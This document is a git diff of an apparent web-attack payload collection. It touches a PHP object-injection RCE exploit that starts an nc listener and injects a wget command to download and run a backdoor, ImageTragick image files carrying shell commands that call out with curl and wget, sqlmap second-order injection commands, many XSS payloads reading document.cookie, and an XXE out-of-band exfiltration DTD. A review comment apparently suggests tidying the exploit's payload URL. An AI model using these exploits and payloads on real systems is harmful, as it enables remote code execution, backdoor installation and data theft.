diff --git a/PHP serialization/PHP-Serialization-RCE-Exploit.php b/PHP serialization/PHP-Serialization-RCE-Exploit.php index af0aae4..8ae88db 100755 --- a/PHP serialization/PHP-Serialization-RCE-Exploit.php +++ b/PHP serialization/PHP-Serialization-RCE-Exploit.php @@ -19,7 +19,7 @@ system('gnome-terminal -x sh -c \'nc -lvvp 4242\''); class PHPObjectInjection { // CHANGE URL/FILENAME TO MATCH YOUR SETUP - public $inject = "system('wget http://92.222.81.2/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');"; + public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');"; } $url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER diff --git a/SQL injection/README.md b/SQL injection/README.md index 1a77614..4080da4 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -37,6 +37,13 @@ python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" The injection is located at the '*' ``` +Second order injection +``` +python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 +sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs +``` + + General tamper option and tamper's list ``` tamper=name_of_the_tamper 
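Review bot: The replacement still hard-codes the fetch URL as a string literal inside the `PHPObjectInjection` class body, while the other setup value, `$url`, is a top-level variable with its own CHANGE comment, so a reader has two unlinked places to edit. Consider declaring the property typed and unset, `public string $inject;`, and assigning it once at top level next to `$url` from a single placeholder such as `$payloadUrl = 'http://127.0.0.1/backdoor.txt'; // CHANGE TO MATCH YOUR SETUP`, so both values that must be changed sit together. Adding the `string` type does not change what `serialize()` emits for the property, so the serialized form stays as it is now. The enclosing script continues on both sides of the hunk.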
@@ -328,3 +335,6 @@ mysql> mysql> select version();
 - [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
 - [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
 - [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
+* Second Order:
+ - [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
+ - [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
diff --git a/Upload insecure files/Image Tragik/payload_imageover_wget.gif b/Upload insecure files/Image Tragik/payload_imageover_wget.gif
index 1c0ee01..b2dc7ad 100755
--- a/Upload insecure files/Image Tragik/payload_imageover_wget.gif
+++ b/Upload insecure files/Image Tragik/payload_imageover_wget.gif
@@ -1,4 +1,4 @@
 push graphic-context
 viewbox 0 0 640 480
-image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 92.222.81.2:1337 > /dev/null`'
+image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`'
 pop graphic-context
diff --git a/Upload insecure files/Image Tragik/payload_url_curl.png b/Upload insecure files/Image Tragik/payload_url_curl.png
index a215d25..633b15b 100755
--- a/Upload insecure files/Image Tragik/payload_url_curl.png
+++ b/Upload insecure files/Image Tragik/payload_url_curl.png
@@ -1,4 +1,4 @@
 push graphic-context
 viewbox 0 0 640 480
-fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "92.222.81.2)'
+fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)'
 pop graphic-context
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 1325bc6..48a3690 100644
--- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -83,26 +83,6 @@ With an additional URL ``` -XSS in flash application -``` -flashmediaelement.swf?jsinitfunctio%gn=alert`1` -flashmediaelement.swf?jsinitfunctio%25gn=alert(1) -ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 -swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// -swfupload.swf?buttonText=test&.swf -plupload.flash.swf?%#target%g=alert&uid%g=XSS& -moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true -video-js.swf?readyFunction=alert(1) -player.swf?playerready=alert(document.cookie) -player.swf?tracecall=alert(document.cookie) -banner.swf?clickTAG=javascript:alert(1);// -io.swf?yid=\"));}catch(e){alert(1);}// -video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 -bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 -flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// -phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// -``` - XSS in Hidden input ``` @@ -159,6 +139,7 @@ XSS with data: ``` data:text/html, data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ + ``` XSS with vbscript: only IE @@ -200,7 +181,7 @@ XSS in SVG (short) </title><script>alert(3)</script> ``` -XSS in SWF +XSS in SWF flash application ``` Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} 
@@ -213,10 +194,30 @@ open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/ http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/ eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain) ``` - more payloads in ./files +XSS in SWF flash application +``` +flashmediaelement.swf?jsinitfunctio%gn=alert`1` +flashmediaelement.swf?jsinitfunctio%25gn=alert(1) +ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 +swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// +swfupload.swf?buttonText=test&.swf +plupload.flash.swf?%#target%g=alert&uid%g=XSS& +moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true +video-js.swf?readyFunction=alert(1) +player.swf?playerready=alert(document.cookie) +player.swf?tracecall=alert(document.cookie) +banner.swf?clickTAG=javascript:alert(1);// +io.swf?yid=\"));}catch(e){alert(1);}// +video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 +bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 +flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// +phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// +``` + + ## XSS with Relative Path Overwrite - IE 8/9 and lower 
@@ -412,6 +413,17 @@ javascript://-->*/alert()/* ``` +Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) +![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) +``` +-->'"/> +``` +![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) +``` + ``` -Bypass using an alternate way to execute an alert +Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) ``` - - - - - - - +window['alert'](0) +parent['alert'](1) +self['alert'](2) +top['alert'](3) +this['alert'](4) +frames['alert'](5) +content['alert'](6) +[7].map(alert) +[8].find(alert) +[9].every(alert) +[10].filter(alert) +[11].findIndex(alert) +[12].forEach(alert); ``` Bypass using an alternate way to trigger an alert @@ -677,3 +695,5 @@ Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermissi * http://d3adend.org/xss/ghettoBypass * http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html * http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html +* https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5 +* https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309 diff --git a/XXE injections/README.md b/XXE injections/README.md index ed8cf4e..7333d5b 100644 --- a/XXE injections/README.md +++ b/XXE injections/README.md @@ -125,15 +125,15 @@ XXE OOB with DTD and PHP filter - + %sp; %param1; ]> &exfil; -File stored on http://92.222.81.2/dtd.xml +File stored on http://127.0.0.1/dtd.xml -"> +"> ``` XXE Inside SOAP